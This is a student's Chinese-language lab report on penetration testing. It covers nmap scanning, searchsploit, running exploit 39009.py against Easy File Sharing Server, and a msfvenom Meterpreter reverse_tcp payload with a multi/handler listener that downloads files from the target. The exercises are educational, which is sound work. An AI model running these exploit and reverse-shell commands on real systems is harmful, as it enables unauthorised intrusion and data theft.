实验1:漏洞渗透测试
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。
实验1步骤:
步骤1:将物理机上的efssetup_2018.zip文件下载到Windows靶机中
运行过程中可能出现问题
意思是80端口已经被其他的web服务占用了,需要设置一个其他的端口号,我这里设置成了8000端口
步骤2:在kali虚拟机上,使用nmap -O发现同一网络下,靶机的IP地址
步骤3:使用nmap -sV 靶机IP地址,扫描靶机端口开放情况
步骤4:使用指令searchsploit easy file sharing检测easy file sharing server这个服务存在的漏洞,发现许多溢出漏洞
步骤5:以39009.py这一个程序为例,使用searchsploit -m 39009这一指令查询其地址
步骤6:执行指令:python /usr/share/exploitdb/exploits/windows/remote/39009.py 靶机的IP 8000
发现问题
后来查阅才知道,kali直接使用python指令默认的版本是python3,将指令改为python2版本即可
发现靶机自动弹出计算器
实验2:Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
实验2步骤:
步骤1:使用指令:msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的IP lport=kali的端口号 -f exe -o /root/payload.exe
执行后会在kali上生成payload.exe
步骤2:在kali终端输入msfconsole指令打开Metasploit
步骤3:在Metasploit其中分别输入指令use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost kali的IP地址;set lport 刚刚设置的端口号;exploit
步骤4:将第一步在kali生成的payload.exe文件移动至Window靶机中,而后在靶机中执行,之后转到kali虚拟机。会出现以下提示,这时已经获取了对靶机的操控权限。
可以先使用ls查看文件,再用download 文件名下载